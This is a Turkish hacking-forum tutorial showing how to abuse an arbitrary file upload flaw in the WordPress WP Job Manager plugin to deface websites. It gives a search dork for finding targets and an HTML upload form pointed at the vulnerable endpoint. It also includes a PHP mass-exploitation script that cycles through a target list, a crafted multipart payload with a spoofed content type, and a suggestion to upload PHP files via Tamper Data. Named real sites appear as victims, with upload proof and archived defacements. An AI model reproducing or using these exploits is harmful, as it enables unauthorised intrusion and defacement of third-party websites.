WordPress Job Manager Exploit Resimli Anlatım

1. Exploit Türkçe Yazarı => KingSkrupellos - Cyberizm.Org Digital Security Team
2.  
3. Exploit İsmi => WordPress Plugins WP Job Manager Vulnerability Exploit Rastgele Dosya Yükleme Açığı
4.  
5. Satıcı WebSitesi => wpjobmanager.com
6.  
7. Konu => https://www.cyberizm.org/cyberizm-wordpress-job-manager-exploit-resimli-anlatim-05-06-2017.html
8.  
9. WordPress.Org'dan İndirme Linki => wordpress.org/plugins/job-manager/
10.  
11. Arama Motoru Aratma Dorku => inurl:''/wp-content/plugins/wp-job-manager/''
12.  
13. Arama Motorundan çıkan herhangi bir Sitede Açık olup olmadığını öğrenmenin yolu =>
14.  
15. 1. Öğrenme Yolu =>
16.  
17. HEDEFSITE/jm-ajax/upload_file/
18.  
19. Karşımıza Dosya Yüklemeyle alakalı bir ekranda şu yazı yazması gerekiyor : '' {"files":[]} ''
20.  
21. 2. Öğrenme Yolu =>
22.  
23. HEDEFSITE/post-a-job => İki şekilde olabiliyor => No Results Found => Hiçbir sonuç bulunamadı. Hemen paniğe kapılmayın. Belki açık vardır diye yola devam ediyoruz.
24.  
25. [img]https://i.hizliresim.com/WQWomQ.png[/img]
26.  
27. İkincisi direk upload ekranı sitenin üzerinde o da güzel. Hemen uygulayalım.
28.  
29. Örnek Site => securise.in
30.  
31. [img]https://i.hizliresim.com/1gj79b.png[/img]
32. [img]https://i.hizliresim.com/zBQy69.png[/img]
33. [img]https://i.hizliresim.com/LndGJz.png[/img]
34.  
35. Karşımıza Direk '' Add a Job '' ekranlı direk en altta '' Dosya Seç '' işaretli bir yükleme yeri gelmesi gerekiyor.
36.  
37. E-Mail'i sallayın @ olması gerekiyor. Doldurulması gerekiyorsa * yıldız işareti oluyor. Çoğu zaman doldurmanıza gerek yok.
38.  
39. En altta .jpg .png .gif uzantılı kendinize ait hacked resmini siteye yükleyebilirsiniz.
40.  
41. Son Zamanlarda Zone-H.Org'da çok fazla gördüğüm için paylaşıyım dedim. Ekmek su gibi gidiyor mübarek :D
42.  
43. Örnek Site =>
44.  
45. securise.in/jm-ajax/upload_file
46.  
47. Archive Kaydı => archive.is/9fjCm
48.  
49. Dosyamız Nereye yükleniyor peki ?
50.  
51. HEDEFSITE/wp-content/uploads/job-manager-uploads/company_logo/YIL/GÜN/DOSYANIZIN-İSMİ.png
52.  
53. Maalesef shell.php.jpg gibi ve buna benzer şekilde Shell Yüklenemiyor.
54.  
55. WordPress Plugins WP Job Manager Exploit Kodumuz =>
56.  
57. [hide][code]<form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
58. <input type="file" name="files[]" />
59. <button>Upload!</button><br/>
60. </form>[/code][/hide]
61.  
62. WordPress Plugins WP Job Manager Exploit Uygulamalı Resimli Anlatım =>
63.  
64. Herşeyden önce hedef sitemizi belirliyoruz. => Örnek HedefSite => shephardashmore.com
65.  
66. [img]https://i.hizliresim.com/6XYMd9.png[/img]
67.  
68. 1) İlk önce XAMPP yada PHP çalıştırabileceğimiz LocalHost üzerinden sitelere yükleme yapacağımızdan dolayı XAMPP'ı uygun işletim sistemine göre indirmemiz gerekiyor.
69.  
70. apachefriends.org/tr/index.html
71.  
72. [img]https://i.hizliresim.com/r2Yyqz.png[/img]
73.  
74. [img]https://i.hizliresim.com/3q2gQp.png[/img]
75.  
76. 2) Ardından XAMPP'ı kurduktan sonra çalıştırmamız gerekiyor. Başlat + Çalıştır + XAMPP Control Panel + Hepsini Çalıştır [ Apache + MySQL + FileZilla + Mercury + Tomcat ]
77.  
78. 3) Sonra Exploiti Kodumuzu içini düzenliyoruz.
79.  
80. <form method="POST" action="https://HEDEFSITEYİ-BURAYA-YAZIN/jm-ajax/upload_file/" enctype="multipart/form-data">
81.  
82. Diğer alttaki kodları oynamayın. Yukarıda tam olarak exploiti kodunu verdim zaten.
83.  
84. [img]https://i.hizliresim.com/RPEG2n.png[/img]
85.  
86. 4) Sonra Başlat + Çalıştır + XAMPP HtDocs Folder'ın içerisine yukarıdaki verdiğim exploit kodunu .html uzantılı dosyamızı buraya ekliyoruz. mesela ben wp-jobmanager.html diye yaptım. dosya isminin ne olduğu önemli değil. .html olsun yeterli.
87.  
88. Dikkat YerelAğ üzerinde çalıştırıyoruz.
89.  
90. [img]https://i.hizliresim.com/pWv2ln.png[/img]
91.  
92. Örnek => file:///C:/xampp/htdocs/wordpress-exploits/wp-jobmanager.html
93.  
94. 5) Dosya Seç / Dosya Seçilmedi / Dosya Yükle / diye bir ekran gelicek. Dosya Yüklüyoruz.
95.  
96. [img]https://i.hizliresim.com/0BbrYo.png[/img]
97.  
98. Yükledikten Sonra bize dosyamızın siteye yüklendiğine dair uyarı veriyor.
99.  
100. Örnek Dosyanın Yüklendiğine Dair Kanıt =>
101.  
102. {"files":[{"url":"http:\/\/shephardashmore.com\/wp-content\/uploads\/job-manager-uploads\/files\/2017\/06\/cyberizm.png","file":"\/var\/www\/vhosts\/shephardashmore.com\/httpdocs\/wp-content\/uploads\/job-manager-uploads\/files\/2017\/06\/cyberizm.png","name":"cyberizm.png","type":"image\/png","size":1177310,"extension":"png"}]}
103.  
104. Sitede uğraştığımız [ cyberizm.png - cyberizm.jpg - cdst.png - kingskrupellos.jpg - kingskrupellos.png ] adlı dosyalarım siteye yüklenmiş bulunmakta. Hemen ünlü mirror sitesi archive.is'e kayıt alıyorum ve burada işimi bitiriyorum.
105.  
106. [img]https://i.hizliresim.com/4MY9EJ.png[/img]
107.  
108. [code]http://archive.is/www.shephardashmore.com[/code]
109.  
110. [img]https://i.hizliresim.com/JldW0j.png[/img]
111.  
112. [img]https://i.hizliresim.com/OLJaGP.png[/img]
113.  
114. Ayrıca buna ilaveten son olarak söylemek istediğim konu ise =>
115.  
116. Mozilla Firefox kullanarak bazı sitelerde %60 oranında Tamper Data kullanarak .php ve .txt .html dosya yükleyebiliriz.
117.  
118. Ayrıca WordPress Job Manager Auto Mass PHP Exploiter
119.  
120. [code]<?php
121. # KingSkrupellos - Cyberizm.Org Digital Security Technological Turkish Moslem Army
122. # https://www.cyberizm.org/cyberizm-wordpress-job-manager-exploit-resimli-anlatim-05-06-2017.html
123.  
124.  
125. $nama = "target.html";
126. $buka=fopen("$nama","r");
127. $size=filesize("$nama");
128. $baca=fread($buka,$size);
129. $sites = explode("\r\n", $baca);
130. foreach($sites as $site){
131. if(preg_match("#http://#", $site)) {
132. $suu = $site;
133. } else {
134. $suu = "http://".$site;
135. }
136. echo "$suu ->";
137. $file = "k.png";
138. $site = "$suu/jm-ajax/upload_file/";
139. $post = array(
140. "file" => "@$file",
141. );
142. $ch = curl_init ("$site");
143. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
144. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
145. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
146. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
147. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
148. curl_setopt ($ch, CURLOPT_POST, 1);
149. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
150. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
151. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
152. $data6 = curl_exec ($ch);
153. if (preg_match("/$file/i", $data6)){
154. $save = "$suu/wp-content/uploads/job-manager-uploads/file/2017/06/$file";
155. echo " \n$save\n";
156.  
157. }else{
158. echo " \nNo\n"; }
159. }
160.  
161.  
162. ?>[/code]
163.  
164. [code]# -----------------------------18132430516394\r\n
165. # Content-Disposition: form-data; name="script"\r\n
166. # \r\n
167. # true\r\n
168. # -----------------------------18132430516394\r\n
169. # Content-Disposition: form-data; name="company_logo"; filename="kingskrupellos.txt"\r\n
170. # Content-Type: image/jpeg\r\n
171. # \r\n[/code]
172.  
173.  
174. İşlem Bu Kadar Basit. [ Use Your Brain ]
175.  
176. Birdahakine bu kadar ince ayrıntısına kadar anlatmam. Değerimi bilin :D
177.  
178. ### CyBeRiZM.Org Digital Security Technological Turkish Moslem Army. Mr. KingSkrupellos ###
179.  
180. __________________________________________________________________________
181.  
182. Alın Size Exploit - Dağıtın Etrafı =>
183.  
184. @OrJiNaL @the_zizil @Lynx @Stallk3r @DarkRivın @JOYGAL @Kulmec @DARKDAYS
185. @Leader Shawai @Julian @BUSE
186.  
187. %100 Alıntısız Tamamen Orjinal konu böyle olur işte değil mi :D Yenilere konu açacak olanlara bunu göstermek lazım :D
188.  
189. @Mr.F92 @Ayar